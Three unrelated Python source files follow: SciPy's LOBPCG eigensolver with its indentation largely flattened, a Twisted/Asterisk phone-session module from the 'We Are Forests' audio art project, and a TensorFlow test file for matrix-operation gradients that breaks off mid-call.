"""Locally Optimal Block Preconditioned Conjugate Gradient Method (LOBPCG)
LOBPCG is a preconditioned eigensolver for large symmetric positive
definite (SPD) generalized eigenproblems.
Parameters
----------
A : {sparse matrix, dense matrix, LinearOperator}
The symmetric linear operator of the problem, usually a
sparse matrix. Often called the "stiffness matrix".
X : ndarray, float32 or float64
Initial approximation to the ``k`` eigenvectors (non-sparse). If `A`
has ``shape=(n,n)`` then `X` should have shape ``shape=(n,k)``.
B : {dense matrix, sparse matrix, LinearOperator}, optional
The right hand side operator in a generalized eigenproblem.
By default, ``B = Identity``. Often called the "mass matrix".
M : {dense matrix, sparse matrix, LinearOperator}, optional
Preconditioner to `A`; by default ``M = Identity``.
`M` should approximate the inverse of `A`.
Y : ndarray, float32 or float64, optional
n-by-sizeY matrix of constraints (non-sparse), sizeY < n
The iterations will be performed in the B-orthogonal complement
of the column-space of Y. Y must be full rank.
tol : scalar, optional
Solver tolerance (stopping criterion).
The default is ``tol=n*sqrt(eps)``.
maxiter : int, optional
Maximum number of iterations. The default is ``maxiter = 20``.
largest : bool, optional
When True, solve for the largest eigenvalues, otherwise the smallest.
verbosityLevel : int, optional
Controls solver output. The default is ``verbosityLevel=0``.
retLambdaHistory : bool, optional
Whether to return eigenvalue history. Default is False.
retResidualNormsHistory : bool, optional
Whether to return history of residual norms. Default is False.
Returns
-------
w : ndarray
Array of ``k`` eigenvalues
v : ndarray
An array of ``k`` eigenvectors. `v` has the same shape as `X`.
lambdas : list of ndarray, optional
The eigenvalue history, if `retLambdaHistory` is True.
rnorms : list of ndarray, optional
The history of residual norms, if `retResidualNormsHistory` is True.
Notes
-----
If both ``retLambdaHistory`` and ``retResidualNormsHistory`` are True,
the return tuple has the following format
``(lambda, V, lambda history, residual norms history)``.
In the following ``n`` denotes the matrix size and ``m`` the number
of required eigenvalues (smallest or largest).
The LOBPCG code internally solves eigenproblems of the size ``3m`` on every
iteration by calling the "standard" dense eigensolver, so if ``m`` is not
small enough compared to ``n``, it does not make sense to call the LOBPCG
code, but rather one should use the "standard" eigensolver, e.g. numpy or
scipy function in this case.
If one calls the LOBPCG algorithm for ``5m > n``, it will most likely break
internally, so the code tries to call the standard function instead.
It is not that ``n`` should be large for the LOBPCG to work, but rather the
ratio ``n / m`` should be large. If you call LOBPCG with ``m=1``
and ``n=10``, it works though ``n`` is small. The method is intended
for extremely large ``n / m`` [4]_.
The convergence speed depends basically on two factors:
1. How well relatively separated the seeking eigenvalues are from the rest
of the eigenvalues. One can try to vary ``m`` to make this better.
2. How well conditioned the problem is. This can be changed by using proper
preconditioning. For example, a rod vibration test problem (under tests
directory) is ill-conditioned for large ``n``, so convergence will be
slow, unless efficient preconditioning is used. For this specific
problem, a good simple preconditioner function would be a linear solve
for `A`, which is easy to code since A is tridiagonal.
References
----------
.. [1] A. V. Knyazev (2001),
Toward the Optimal Preconditioned Eigensolver: Locally Optimal
Block Preconditioned Conjugate Gradient Method.
SIAM Journal on Scientific Computing 23, no. 2,
pp. 517-541. :doi:`10.1137/S1064827500366124`
.. [2] A. V. Knyazev, I. Lashuk, M. E. Argentati, and E. Ovchinnikov
(2007), Block Locally Optimal Preconditioned Eigenvalue Xolvers
(BLOPEX) in hypre and PETSc. :arxiv:`0705.2626`
.. [3] A. V. Knyazev's C and MATLAB implementations:
https://bitbucket.org/joseroman/blopex
.. [4] S. Yamada, T. Imamura, T. Kano, and M. Machida (2006),
High-performance computing for exact numerical approaches to
quantum many-body problems on the earth simulator. In Proceedings
of the 2006 ACM/IEEE Conference on Supercomputing.
:doi:`10.1145/1188455.1188504`
Examples
--------
Solve ``A x = lambda x`` with constraints and preconditioning.
>>> import numpy as np
>>> from scipy.sparse import spdiags, issparse
>>> from scipy.sparse.linalg import lobpcg, LinearOperator
>>> n = 100
>>> vals = np.arange(1, n + 1)
>>> A = spdiags(vals, 0, n, n)
>>> A.toarray()
array([[ 1., 0., 0., ..., 0., 0., 0.],
[ 0., 2., 0., ..., 0., 0., 0.],
[ 0., 0., 3., ..., 0., 0., 0.],
...,
[ 0., 0., 0., ..., 98., 0., 0.],
[ 0., 0., 0., ..., 0., 99., 0.],
[ 0., 0., 0., ..., 0., 0., 100.]])
Constraints:
>>> Y = np.eye(n, 3)
Initial guess for eigenvectors, should have linearly independent
columns. Column dimension = number of requested eigenvalues.
>>> rng = np.random.default_rng()
>>> X = rng.random((n, 3))
Preconditioner in the inverse of A in this example:
>>> invA = spdiags([1./vals], 0, n, n)
The preconditioner must be defined by a function:
>>> def precond( x ):
... return invA @ x
The argument x of the preconditioner function is a matrix inside `lobpcg`,
thus the use of matrix-matrix product ``@``.
The preconditioner function is passed to lobpcg as a `LinearOperator`:
>>> M = LinearOperator(matvec=precond, matmat=precond,
... shape=(n, n), dtype=float)
Let us now solve the eigenvalue problem for the matrix A:
>>> eigenvalues, _ = lobpcg(A, X, Y=Y, M=M, largest=False)
>>> eigenvalues
array([4., 5., 6.])
Note that the vectors passed in Y are the eigenvectors of the 3 smallest
eigenvalues. The results returned are orthogonal to those.
"""
blockVectorX = X
blockVectorY = Y
residualTolerance = tol
if maxiter is None:
maxiter = 20
if blockVectorY is not None:
sizeY = blockVectorY.shape[1]
else:
sizeY = 0
# Block size.
if len(blockVectorX.shape) != 2:
raise ValueError('expected rank-2 array for argument X')
n, sizeX = blockVectorX.shape
if verbosityLevel:
aux = "Solving "
if B is None:
aux += "standard"
else:
aux += "generalized"
aux += " eigenvalue problem with"
if M is None:
aux += "out"
aux += " preconditioning\n\n"
aux += "matrix size %d\n" % n
aux += "block size %d\n\n" % sizeX
if blockVectorY is None:
aux += "No constraints\n\n"
else:
if sizeY > 1:
aux += "%d constraints\n\n" % sizeY
else:
aux += "%d constraint\n\n" % sizeY
print(aux)
A = _makeOperator(A, (n, n))
B = _makeOperator(B, (n, n))
M = _makeOperator(M, (n, n))
if (n - sizeY) < (5 * sizeX):
# warn('The problem size is small compared to the block size.' \
# ' Using dense eigensolver instead of LOBPCG.')
sizeX = min(sizeX, n)
if blockVectorY is not None:
raise NotImplementedError('The dense eigensolver '
'does not support constraints.')
# Define the closed range of indices of eigenvalues to return.
if largest:
eigvals = (n - sizeX, n-1)
else:
eigvals = (0, sizeX-1)
A_dense = A(np.eye(n, dtype=A.dtype))
B_dense = None if B is None else B(np.eye(n, dtype=B.dtype))
vals, vecs = eigh(A_dense, B_dense, eigvals=eigvals,
check_finite=False)
if largest:
# Reverse order to be compatible with eigs() in 'LM' mode.
vals = vals[::-1]
vecs = vecs[:, ::-1]
return vals, vecs
if (residualTolerance is None) or (residualTolerance <= 0.0):
residualTolerance = np.sqrt(1e-15) * n
# Apply constraints to X.
if blockVectorY is not None:
if B is not None:
blockVectorBY = B(blockVectorY)
else:
blockVectorBY = blockVectorY
# gramYBY is a dense array.
gramYBY = np.dot(blockVectorY.T.conj(), blockVectorBY)
try:
# gramYBY is a Cholesky factor from now on...
gramYBY = cho_factor(gramYBY)
except LinAlgError as e:
raise ValueError('cannot handle linearly dependent constraints') from e
_applyConstraints(blockVectorX, gramYBY, blockVectorBY, blockVectorY)
##
# B-orthonormalize X.
blockVectorX, blockVectorBX = _b_orthonormalize(B, blockVectorX)
##
# Compute the initial Ritz vectors: solve the eigenproblem.
blockVectorAX = A(blockVectorX)
gramXAX = np.dot(blockVectorX.T.conj(), blockVectorAX)
_lambda, eigBlockVector = eigh(gramXAX, check_finite=False)
ii = _get_indx(_lambda, sizeX, largest)
_lambda = _lambda[ii]
eigBlockVector = np.asarray(eigBlockVector[:, ii])
blockVectorX = np.dot(blockVectorX, eigBlockVector)
blockVectorAX = np.dot(blockVectorAX, eigBlockVector)
if B is not None:
blockVectorBX = np.dot(blockVectorBX, eigBlockVector)
##
# Active index set.
activeMask = np.ones((sizeX,), dtype=bool)
lambdaHistory = [_lambda]
residualNormsHistory = []
previousBlockSize = sizeX
ident = np.eye(sizeX, dtype=A.dtype)
ident0 = np.eye(sizeX, dtype=A.dtype)
##
# Main iteration loop.
blockVectorP = None # set during iteration
blockVectorAP = None
blockVectorBP = None
iterationNumber = -1
restart = True
explicitGramFlag = False
while iterationNumber < maxiter:
iterationNumber += 1
if verbosityLevel > 0:
print('iteration %d' % iterationNumber)
if B is not None:
aux = blockVectorBX * _lambda[np.newaxis, :]
else:
aux = blockVectorX * _lambda[np.newaxis, :]
blockVectorR = blockVectorAX - aux
aux = np.sum(blockVectorR.conj() * blockVectorR, 0)
residualNorms = np.sqrt(aux)
residualNormsHistory.append(residualNorms)
ii = np.where(residualNorms > residualTolerance, True, False)
activeMask = activeMask & ii
if verbosityLevel > 2:
print(activeMask)
currentBlockSize = activeMask.sum()
if currentBlockSize != previousBlockSize:
previousBlockSize = currentBlockSize
ident = np.eye(currentBlockSize, dtype=A.dtype)
if currentBlockSize == 0:
break
if verbosityLevel > 0:
print('current block size:', currentBlockSize)
print('eigenvalue:', _lambda)
print('residual norms:', residualNorms)
if verbosityLevel > 10:
print(eigBlockVector)
activeBlockVectorR = _as2d(blockVectorR[:, activeMask])
if iterationNumber > 0:
activeBlockVectorP = _as2d(blockVectorP[:, activeMask])
activeBlockVectorAP = _as2d(blockVectorAP[:, activeMask])
if B is not None:
activeBlockVectorBP = _as2d(blockVectorBP[:, activeMask])
if M is not None:
# Apply preconditioner T to the active residuals.
activeBlockVectorR = M(activeBlockVectorR)
##
# Apply constraints to the preconditioned residuals.
if blockVectorY is not None:
_applyConstraints(activeBlockVectorR,
gramYBY, blockVectorBY, blockVectorY)
##
# B-orthogonalize the preconditioned residuals to X.
if B is not None:
activeBlockVectorR = activeBlockVectorR - np.matmul(blockVectorX,
np.matmul(blockVectorBX.T.conj(),
activeBlockVectorR))
else:
activeBlockVectorR = activeBlockVectorR - np.matmul(blockVectorX,
np.matmul(blockVectorX.T.conj(),
activeBlockVectorR))
##
# B-orthonormalize the preconditioned residuals.
aux = _b_orthonormalize(B, activeBlockVectorR)
activeBlockVectorR, activeBlockVectorBR = aux
activeBlockVectorAR = A(activeBlockVectorR)
if iterationNumber > 0:
if B is not None:
aux = _b_orthonormalize(B, activeBlockVectorP,
activeBlockVectorBP, retInvR=True)
activeBlockVectorP, activeBlockVectorBP, invR, normal = aux
else:
aux = _b_orthonormalize(B, activeBlockVectorP, retInvR=True)
activeBlockVectorP, _, invR, normal = aux
# Function _b_orthonormalize returns None if Cholesky fails
if activeBlockVectorP is not None:
activeBlockVectorAP = activeBlockVectorAP / normal
activeBlockVectorAP = np.dot(activeBlockVectorAP, invR)
restart = False
else:
restart = True
##
# Perform the Rayleigh Ritz Procedure:
# Compute symmetric Gram matrices:
if activeBlockVectorAR.dtype == 'float32':
myeps = 1
elif activeBlockVectorR.dtype == 'float32':
myeps = 1e-4
else:
myeps = 1e-8
if residualNorms.max() > myeps and not explicitGramFlag:
explicitGramFlag = False
else:
# Once explicitGramFlag, forever explicitGramFlag.
explicitGramFlag = True
# Shared memory assingments to simplify the code
if B is None:
blockVectorBX = blockVectorX
activeBlockVectorBR = activeBlockVectorR
if not restart:
activeBlockVectorBP = activeBlockVectorP
# Common submatrices:
gramXAR = np.dot(blockVectorX.T.conj(), activeBlockVectorAR)
gramRAR = np.dot(activeBlockVectorR.T.conj(), activeBlockVectorAR)
if explicitGramFlag:
gramRAR = (gramRAR + gramRAR.T.conj())/2
gramXAX = np.dot(blockVectorX.T.conj(), blockVectorAX)
gramXAX = (gramXAX + gramXAX.T.conj())/2
gramXBX = np.dot(blockVectorX.T.conj(), blockVectorBX)
gramRBR = np.dot(activeBlockVectorR.T.conj(), activeBlockVectorBR)
gramXBR = np.dot(blockVectorX.T.conj(), activeBlockVectorBR)
else:
gramXAX = np.diag(_lambda)
gramXBX = ident0
gramRBR = ident
gramXBR = np.zeros((sizeX, currentBlockSize), dtype=A.dtype)
        def _handle_gramA_gramB_verbosity(gramA, gramB):
            """Diagnostics for the Rayleigh-Ritz Gram matrices: report any
            non-Hermitian component and, at very high verbosity, dump both
            matrices to text files in the working directory."""
            if verbosityLevel > 0:
                _report_nonhermitian(gramA, 'gramA')
                _report_nonhermitian(gramB, 'gramB')
            if verbosityLevel > 10:
                # Note: not documented, but leave it in here for now
                np.savetxt('gramA.txt', gramA)
                np.savetxt('gramB.txt', gramB)
if not restart:
gramXAP = np.dot(blockVectorX.T.conj(), activeBlockVectorAP)
gramRAP = np.dot(activeBlockVectorR.T.conj(), activeBlockVectorAP)
gramPAP = np.dot(activeBlockVectorP.T.conj(), activeBlockVectorAP)
gramXBP = np.dot(blockVectorX.T.conj(), activeBlockVectorBP)
gramRBP = np.dot(activeBlockVectorR.T.conj(), activeBlockVectorBP)
if explicitGramFlag:
gramPAP = (gramPAP + gramPAP.T.conj())/2
gramPBP = np.dot(activeBlockVectorP.T.conj(),
activeBlockVectorBP)
else:
gramPBP = ident
gramA = bmat([[gramXAX, gramXAR, gramXAP],
[gramXAR.T.conj(), gramRAR, gramRAP],
[gramXAP.T.conj(), gramRAP.T.conj(), gramPAP]])
gramB = bmat([[gramXBX, gramXBR, gramXBP],
[gramXBR.T.conj(), gramRBR, gramRBP],
[gramXBP.T.conj(), gramRBP.T.conj(), gramPBP]])
_handle_gramA_gramB_verbosity(gramA, gramB)
try:
_lambda, eigBlockVector = eigh(gramA, gramB,
check_finite=False)
except LinAlgError:
# try again after dropping the direction vectors P from RR
restart = True
if restart:
gramA = bmat([[gramXAX, gramXAR],
[gramXAR.T.conj(), gramRAR]])
gramB = bmat([[gramXBX, gramXBR],
[gramXBR.T.conj(), gramRBR]])
_handle_gramA_gramB_verbosity(gramA, gramB)
try:
_lambda, eigBlockVector = eigh(gramA, gramB,
check_finite=False)
except LinAlgError as e:
raise ValueError('eigh has failed in lobpcg iterations') from e
ii = _get_indx(_lambda, sizeX, largest)
if verbosityLevel > 10:
print(ii)
print(_lambda)
_lambda = _lambda[ii]
eigBlockVector = eigBlockVector[:, ii]
lambdaHistory.append(_lambda)
if verbosityLevel > 10:
print('lambda:', _lambda)
# # Normalize eigenvectors!
# aux = np.sum( eigBlockVector.conj() * eigBlockVector, 0 )
# eigVecNorms = np.sqrt( aux )
# eigBlockVector = eigBlockVector / eigVecNorms[np.newaxis, :]
# eigBlockVector, aux = _b_orthonormalize( B, eigBlockVector )
if verbosityLevel > 10:
print(eigBlockVector)
# Compute Ritz vectors.
if B is not None:
if not restart:
eigBlockVectorX = eigBlockVector[:sizeX]
eigBlockVectorR = eigBlockVector[sizeX:sizeX+currentBlockSize]
eigBlockVectorP = eigBlockVector[sizeX+currentBlockSize:]
pp = np.dot(activeBlockVectorR, eigBlockVectorR)
pp += np.dot(activeBlockVectorP, eigBlockVectorP)
app = np.dot(activeBlockVectorAR, eigBlockVectorR)
app += np.dot(activeBlockVectorAP, eigBlockVectorP)
bpp = np.dot(activeBlockVectorBR, eigBlockVectorR)
bpp += np.dot(activeBlockVectorBP, eigBlockVectorP)
else:
eigBlockVectorX = eigBlockVector[:sizeX]
eigBlockVectorR = eigBlockVector[sizeX:]
pp = np.dot(activeBlockVectorR, eigBlockVectorR)
app = np.dot(activeBlockVectorAR, eigBlockVectorR)
bpp = np.dot(activeBlockVectorBR, eigBlockVectorR)
if verbosityLevel > 10:
print(pp)
print(app)
print(bpp)
blockVectorX = np.dot(blockVectorX, eigBlockVectorX) + pp
blockVectorAX = np.dot(blockVectorAX, eigBlockVectorX) + app
blockVectorBX = np.dot(blockVectorBX, eigBlockVectorX) + bpp
blockVectorP, blockVectorAP, blockVectorBP = pp, app, bpp
else:
if not restart:
eigBlockVectorX = eigBlockVector[:sizeX]
eigBlockVectorR = eigBlockVector[sizeX:sizeX+currentBlockSize]
eigBlockVectorP = eigBlockVector[sizeX+currentBlockSize:]
pp = np.dot(activeBlockVectorR, eigBlockVectorR)
pp += np.dot(activeBlockVectorP, eigBlockVectorP)
app = np.dot(activeBlockVectorAR, eigBlockVectorR)
app += np.dot(activeBlockVectorAP, eigBlockVectorP)
else:
eigBlockVectorX = eigBlockVector[:sizeX]
eigBlockVectorR = eigBlockVector[sizeX:]
pp = np.dot(activeBlockVectorR, eigBlockVectorR)
app = np.dot(activeBlockVectorAR, eigBlockVectorR)
if verbosityLevel > 10:
print(pp)
print(app)
blockVectorX = np.dot(blockVectorX, eigBlockVectorX) + pp
blockVectorAX = np.dot(blockVectorAX, eigBlockVectorX) + app
blockVectorP, blockVectorAP = pp, app
if B is not None:
aux = blockVectorBX * _lambda[np.newaxis, :]
else:
aux = blockVectorX * _lambda[np.newaxis, :]
blockVectorR = blockVectorAX - aux
aux = np.sum(blockVectorR.conj() * blockVectorR, 0)
residualNorms = np.sqrt(aux)
# Future work: Need to add Postprocessing here:
# Making sure eigenvectors "exactly" satisfy the blockVectorY constrains?
# Making sure eigenvecotrs are "exactly" othonormalized by final "exact" RR
# Computing the actual true residuals
if verbosityLevel > 0:
print('final eigenvalue:', _lambda)
print('final residual norms:', residualNorms)
if retLambdaHistory:
if retResidualNormsHistory:
return _lambda, blockVectorX, lambdaHistory, residualNormsHistory
else:
return _lambda, blockVectorX, lambdaHistory
else:
if retResidualNormsHistory:
return _lambda, blockVectorX, residualNormsHistory
else:
return _lambda, blockVectorX
| |
# We Are Forests
# http://weareforests.com/
#
# a project by Duncan Speakman and Emilie Grenier
# -----------------------------------------------
#
# supported by Nederlands Instituut voor de Mediakunst - http://www.nimk.nl/
#
# Source code (c) 2011 Arjan Scherpenisse <arjan@scherpenisse.net>
# This code is released under the MIT license. See LICENSE for details.
import hashlib
import random
import time
from epsilon.extime import Time
from twisted.internet import reactor
from axiom.item import Item
from axiom.attributes import text, timestamp, integer, boolean, AND
from sparked import application
from weareforests.pqueue import PriorityQueue
class Recording (Item):
    """
    A single recorded audio fragment persisted in the axiom store.
    """
    created = timestamp()
    caller_id = text()
    filename = text()
    duration = integer() # in frames
    use_in_ending = boolean()
    user_recording = boolean()

    def filenameAsPath(self, app):
        """
        Return absolute filename without extension
        """
        return app.recordingsPath.child(self.filename).path

    def filenameAsURL(self):
        """
        Return filename as MP3 url
        """
        return "/recordings/" + self.filename + ".mp3"

    def filenameAsAsterisk(self):
        """Return the sample name under which Asterisk can play this file."""
        return "weareforests-recordings/%s" % self.filename

    @staticmethod
    def userRecordingFilename(app):
        """
        Generate a new, not-yet-existing filename for a user recording.
        """
        base = "user-%d" % time.time()
        candidate = base
        attempt = 1
        # Probe 'user-<ts>', 'user-<ts>-1', 'user-<ts>-2', ... until unused.
        while app.recordingsPath.child(candidate).exists():
            candidate = base + ("-%d" % attempt)
            attempt += 1
        return candidate
class CallerSession (object):
    """
    One caller's phone session, driven through the Asterisk AGI.

    Implements a small state machine (sparked StateMachine) that plays a
    queue of recordings, lets the caller press '1' to record a fragment,
    and can hand the caller over to the conference.

    NOTE: Python 2 module (print statements, unicode()).
    """
    # DTMF key ('1') that interrupts playback to start recording.
    digit = ord("1")
    app = None
    agi = None
    queue = None
    isReconnect = False
    # info
    channel = None
    callerId = None
    timeStarted = None
    # conference user id
    conferenceUserId = None
    isLivePhone = False
    # state machine
    state = None

    def __init__(self, app, agi, isReconnect):
        self.app = app
        self.agi = agi
        self.isReconnect = self.isReconnect or isReconnect
        self.queue = PriorityQueue()
        print self.agi.variables
        self.callerId = unicode(self.agi.variables['agi_callerid'])
        self.channel = self.agi.variables['agi_channel']
        self.timeStarted = Time()
        print "New session from", self.callerId
        self.state = application.StateMachine(self, verbose=1)
        # Outgoing calls (DialOut script) must confirm before starting.
        script = self.agi.variables.get('agi_network_script', None)
        if script == 'DialOut':
            self.state.set("pending_start")
        else:
            self.state.set("start")

    def reEntry(self, agi, isReconnect):
        """
        Re-attach a fresh AGI connection to this session and resume from
        the 'to_*' state that was left behind when the previous AGI
        connection went away (see catchHangup).
        """
        self.agi = agi
        self.isReconnect = self.isReconnect or isReconnect
        if self.state.get == 'to_recording':
            self.setStateAfterSample("recording", "weareforests-audio/record")
        if self.state.get == 'to_play':
            self.state.set('play')
        if self.state.get == 'to_start':
            self.state.set('start')
        if self.state.get == 'to_ending':
            # Rebuild the queue with every recording flagged for the ending.
            self.queue = PriorityQueue()
            for f in [r.filenameAsAsterisk() for r in self.app.store.query(Recording, Recording.use_in_ending == True, sort=Recording.created.descending)]:
                self.queueAdd(f)
            self.state.set('ending')

    def enter_ending(self):
        """Play the 'ending' queue one item at a time until it is empty."""
        if self.queue.isEmpty():
            self.state.set("ended")
            self.app.pingWebSessions()
            return
        item = self.queue.pop()
        self.app.pingWebSessions()
        self.setStateAfterSample("ending", item)

    def enter_ended(self):
        """Terminal state: loop silence after the ending has played out."""
        self.setStateAfterSample("ended", "weareforests-audio/silent")

    def queueAdd(self, r):
        # Normal priority.
        self.queue.append(10, r)

    def queueAddFirst(self, r):
        # Higher priority (lower number): plays before queueAdd items.
        self.queue.append(5, r)

    def enter_start(self):
        """Entry state: reconnects go straight to the conference, fresh
        callers get the initial playback queue."""
        if self.isReconnect:
            self.agi.finish()
            self.app.transferToConference(self)
            return
        for f in self.app.getInitialQueue():
            self.queueAdd(f)
        self.state.set("play")

    def enter_play(self, recording=None, offset=0):
        """
        A recording has finished or a previous sample has finished;
        choose a new recording to play.  Pressing '1' during playback
        switches to the recording state, remembering where we were.
        """
        self.app.pingWebSessions()
        # look up the next recording
        if not recording:
            if self.queue.isEmpty():
                # if no recording, transfer to conference
                self.agi.finish()
                self.app.transferToConference(self)
                current = "weareforests-audio/silent"
            else:
                current = self.queue.pop()
        else:
            current = recording
        print "Playing recording: %s, offset %d" % (current, offset)
        d = self.agi.streamFile(str(current), chr(self.digit), offset)
        def audioDone(r):
            # r is (pressed digit, playback offset in the file).
            digit, offset = r
            if digit == self.digit:
                self.setStateAfterSample("recording", "weareforests-audio/record", current, offset)
            else:
                self.state.set("play")
        d.addCallback(audioDone)
        d.addErrback(self.catchHangup)

    def enter_recording(self, currentlyPlaying=None, offset=0):
        """
        User has pressed '1' to start the recording.
        Records up to 45 seconds, stores it, then resumes playback at the
        point where the user interrupted.
        """
        self.app.pingWebSessions()
        start = Time()
        filename = Recording.userRecordingFilename(self.app)
        d = self.agi.recordFile("weareforests-recordings/" + filename, "gsm", chr(self.digit), 45)
        def save(r):
            digit, tpe, duration = r
            # Asterisk reports duration in samples; 8000 Hz -> seconds.
            duration = duration / 8000
            rec = Recording(store=self.app.store, filename=unicode(filename), created=start, caller_id=self.callerId, duration=duration, user_recording=True)
            print "saved!"
            if tpe == 'hangup':
                print "user hung up during recording."
                self.app.sessionEnded(self.channel)
            # add it to everybody's queue
            self.app.recordingAdded(self, rec)
            # resume play where we stopped
            self.setStateAfterSample("play", "weareforests-audio/listen", currentlyPlaying, offset)
        d.addCallback(save)
        d.addErrback(self.catchHangup)

    def setStateAfterSample(self, state, sample, *args):
        """Play `sample` to completion, then switch to `state` (with args)."""
        d = self.agi.streamFile(str(sample), "", 0)
        def audioDone(r):
            print "audio done"
            self.state.set(state, *args)
        d.addCallback(audioDone)
        d.addErrback(self.catchHangup)

    def catchHangup(self, f):
        """Errback for all AGI calls: clean up when the caller hangs up."""
        self.queue.empty()
        self.agi.finish()
        # 'to_*' states mean a planned disconnect (awaiting reEntry): keep
        # the session alive instead of tearing it down.
        if self.state.get[:3] == 'to_':
            return
        print "***", f
        self.app.sessionEnded(self.channel)

    def enter_pending_start(self, count=10):
        """
        Press 1 to start.  The welcome prompt is replayed up to `count`
        times; when the counter runs out the channel is hung up.
        """
        self.app.pingWebSessions()
        if count == 0:
            self.app.admin.hangup(self.channel)
        d = self.agi.streamFile("weareforests-audio/welcome", chr(self.digit))
        def audioDone(r):
            digit, offset = r
            if digit == self.digit:
                self.setStateAfterSample("start", "weareforests-audio/shortsilence")
            else:
                self.state.set("pending_start", count-1)
        d.addCallback(audioDone)
        d.addErrback(self.catchHangup)
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.linalg_grad."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.linalg import linalg_impl
from tensorflow.python.platform import test as test_lib
def _AddTest(test, op_name, testcase_name, fn):
test_name = '_'.join(['test', op_name, testcase_name])
if hasattr(test, test_name):
raise RuntimeError('Test %s defined more than once' % test_name)
setattr(test, test_name, fn)
class ShapeTest(test_lib.TestCase):
  """Gradient flow through batch ops whose sizes are only known at runtime."""

  def testBatchGradientUnknownSize(self):
    """Gradient of sum(det(I)) over a batch of identities equals the batch."""
    with self.cached_session():
      batch_size = constant_op.constant(3)
      matrix_size = constant_op.constant(4)
      # Batch of 3 identity matrices of size 4x4, built from tensor sizes.
      batch_identity = array_ops.tile(
          array_ops.expand_dims(
              array_ops.diag(array_ops.ones([matrix_size])), 0),
          [batch_size, 1, 1])
      determinants = linalg_ops.matrix_determinant(batch_identity)
      reduced = math_ops.reduce_sum(determinants)
      sum_grad = gradients_impl.gradients(reduced, batch_identity)[0]
      # d det(A)/dA = det(A) * inv(A)^T, which is I for identity input, so
      # the gradient should reproduce the identity batch exactly.
      self.assertAllClose(batch_identity.eval(), self.evaluate(sum_grad))
class MatrixUnaryFunctorGradientTest(test_lib.TestCase):
  """Empty container class; test methods are attached below via _AddTest."""
  pass  # Filled in below
def _GetMatrixUnaryFunctorGradientTest(functor_, dtype_, shape_, **kwargs_):
  """Builds a test method that checks gradients of the unary matrix op
  `functor_` on a random input of the given shape and dtype, comparing the
  theoretical (symbolic) Jacobian against a numerical central difference."""

  def Test(self):
    with self.session(use_gpu=True):
      np.random.seed(1)
      a_np = np.random.uniform(
          low=-1.0, high=1.0,
          size=np.prod(shape_)).reshape(shape_).astype(dtype_)
      a = constant_op.constant(a_np)
      if functor_.__name__ == 'matrix_square_root':
        # Square the input matrix to ensure that its matrix square root exists
        a = math_ops.matmul(a, a)
        a_np = self.evaluate(a)
      b = functor_(a, **kwargs_)

      # Optimal stepsize for central difference is O(epsilon^{1/3}).
      epsilon = np.finfo(dtype_).eps
      delta = epsilon**(1.0 / 3.0)
      # tolerance obtained by looking at actual differences using
      # np.linalg.norm(theoretical-numerical, np.inf) on -mavx build
      tol = 1e-6 if dtype_ == np.float64 else 0.05

      theoretical, numerical = gradient_checker.compute_gradient(
          a,
          a.get_shape().as_list(),
          b,
          b.get_shape().as_list(),
          x_init_value=a_np,
          delta=delta)
      self.assertAllClose(theoretical, numerical, atol=tol, rtol=tol)

  return Test
class MatrixBinaryFunctorGradientTest(test_lib.TestCase):
  """Empty container class; test methods are attached below via _AddTest."""
  pass  # Filled in below
def _GetMatrixBinaryFunctorGradientTest(functor_,
                                        dtype_,
                                        shape_,
                                        float32_tol_fudge=1.0,
                                        **kwargs_):
  """Builds a test method checking gradients of the binary matrix op
  `functor_(a, b)` w.r.t. both operands.  `float32_tol_fudge` loosens the
  float32 tolerance for less well-conditioned functors."""

  def Test(self):
    # TODO(rmlarsen): Debug illegal address bug on CUDA and re-enable
    # GPU test for matrix_solve.
    use_gpu = False if functor_ == linalg_ops.matrix_solve else True

    with self.session(use_gpu=use_gpu):
      np.random.seed(1)
      a_np = np.random.uniform(
          low=-1.0, high=1.0,
          size=np.prod(shape_)).reshape(shape_).astype(dtype_)
      a = constant_op.constant(a_np)

      b_np = np.random.uniform(
          low=-1.0, high=1.0,
          size=np.prod(shape_)).reshape(shape_).astype(dtype_)
      b = constant_op.constant(b_np)
      c = functor_(a, b, **kwargs_)

      # Optimal stepsize for central difference is O(epsilon^{1/3}).
      epsilon = np.finfo(dtype_).eps
      delta = epsilon**(1.0 / 3.0)
      # tolerance obtained by looking at actual differences using
      # np.linalg.norm(theoretical-numerical, np.inf) on -mavx build
      tol = 1e-6 if dtype_ == np.float64 else float32_tol_fudge * 0.05
      # The gradients for a and b may be of very different magnitudes,
      # so to not get spurious failures we test them separately.
      for factor, factor_init in [a, a_np], [b, b_np]:
        theoretical, numerical = gradient_checker.compute_gradient(
            factor,
            factor.get_shape().as_list(),
            c,
            c.get_shape().as_list(),
            x_init_value=factor_init,
            delta=delta)
        self.assertAllClose(theoretical, numerical, atol=tol, rtol=tol)

  return Test
if __name__ == '__main__':
  # Tests for gradients of binary matrix operations.
  for dtype in np.float32, np.float64:
    for size in 2, 5, 10:
      # We skip the rank 4, size 10 case: it is slow and conceptually covered
      # by the other cases.
      for extra in [(), (2,), (3,)] + [(3, 2)] * (size < 10):
        for adjoint in False, True:
          shape = extra + (size, size)
          name = '%s_%s_adj_%s' % (dtype.__name__, '_'.join(map(str, shape)),
                                   str(adjoint))
          _AddTest(MatrixBinaryFunctorGradientTest, 'MatrixSolveGradient', name,
                   _GetMatrixBinaryFunctorGradientTest(
                       linalg_ops.matrix_solve, dtype, shape, adjoint=adjoint))

          for lower in True, False:
            # BUGFIX: use a dedicated variable instead of rebinding `name`.
            # Previously `name = '%s_low_%s' % (name, lower)` made the second
            # iteration inherit the first iteration's suffix, producing test
            # names like '..._low_True_low_False'.
            tri_name = '%s_low_%s' % (name, lower)
            _AddTest(MatrixBinaryFunctorGradientTest,
                     'MatrixTriangularSolveGradient', tri_name,
                     _GetMatrixBinaryFunctorGradientTest(
                         linalg_ops.matrix_triangular_solve,
                         dtype,
                         shape,
